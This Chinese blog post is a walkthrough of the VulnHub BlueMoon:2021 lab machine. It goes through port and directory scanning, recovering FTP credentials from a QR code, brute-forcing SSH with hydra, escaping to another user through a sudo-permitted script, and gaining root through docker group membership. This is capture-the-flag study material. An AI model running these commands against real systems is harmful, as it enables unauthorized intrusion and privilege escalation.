靶机下载地址: https://www.vulnhub.com/entry/bluemoon-2021,679/
教程链接地址: https://www.jianshu.com/p/5d5b7f2d20e4

# 确认攻击目标

攻击机 KALI: 192.168.31.135
靶机 BLUEMOON:桥接于 192.168.31.1 的网卡,ip 未知

1 )确定靶机 ip 地址
sudo arp-sacn -l

Image

-> 靶机 ip:192.168.31.153

2 )确认靶机 ip 开放的端口信息
sudo nmap -p 192.168.0.153

Image

-> 靶机开放端口 21,22,80

# FTP 弱口令

打开 http://192.168.0.153 进行信息收集

Image

查看源代码,发现一个图片的地址

Image

看样子是一个蓝色的月球,但是这个图片没什么作用

Image

先尝试从 ftp 进行突破 ftp 192.168.0.153

Image

尝试弱口令登陆失败,接下来对 80 网站进行目录扫描

# 网站信息收集

可以使用各种工具扫描,扫描结果可能因为字典的不同而得到不同的结果,这里我用 dirmap 和 gobuster 两者都扫描了一次

python3 dirmap.py -i http://192.168.0.153 -lcf
gobuster dir -x php,txt,html,zip,rar,jpg,png -w /usr/share/wordlists/dirbuster/directory- list-2.3-medium.txt -u http://192.168.0.153

Image

dirmap 默认的字典并不是很全,如果需要有更准确的信息,需要换字典

Image

用 dirbuster 中的 directory 字典扫出来了一个目录:http://192.168.0.153/hidden_text

Image

查看源代码,看能否有更多的发现,找到了一个隐藏的图片

Image

访问得到了一个 url 地址: http://192.168.0.153/.QR_C0d3.png

Image

# linux 识别二维码

用 linux 来识别这个二维码,看能否从这个二维码中得到更多可靠的信息

下载到 kali 机器上,并修改文件名字为 qr.png: wget http://192.168.0.153/.QR_C0d3.png -O qr.png

Image

Linux 下可以用 zbarimg 来识别二维码
zbarimg x.png

Image

-> 找到了 ftp 的账户和密码 ftp:ftpp@ssword

# FTP 信息收集

登陆到 ftp 服务器查看存在 ftp 中的有哪些文件

Image

将 ftp 服务中的资料下载到本地查看内容

Image

-> Infromation 中的内容如下,透露出来一个用户名 robin,并且他的密码强度弱 p_lists.txt 为一些密码,很显然需要通过 hydra 爆破

Image

用 robin 作为用户名,p_lists 做为密码进行爆破 ssh,得到了密码
hydra -l robin -P p_lists.txt ssh://192.168.0.153 -f -t 4 -I -vV -o hydra.ssh

Image

通过 ssh 命令成功登陆到了靶机中
ssh 192.168.0.153 -l robin

Image

# docker 提权

sudo -l 查看有无权限设置错误

Image

发现可以以 jerry 的身份执行这个脚本 sudo -u jerry /home/robin/project/feedback.sh
执行后,输入两个 bash,拿到了 jerry 的权限

用 python3 调整为一个比较美观的终端: python3 -c 'import pty; pty.spawn("/bin/bash")'

Image
1
2
3
4
5
# 执行id的时候发现属于docker组,尝试用docker提权
docker run -v /:/mnt --rm -it alpine chroot /mnt sh

# 调整shell输出比较美观的shell
SHELL=/bin/bash script -q /dev/null
Image

-> 成功拿到了 root 权限

更新于 阅读次数

请我喝[茶]~( ̄▽ ̄)~*

.N1h1l157 微信支付

微信支付

.N1h1l157 支付宝

支付宝

.N1h1l157 贝宝

贝宝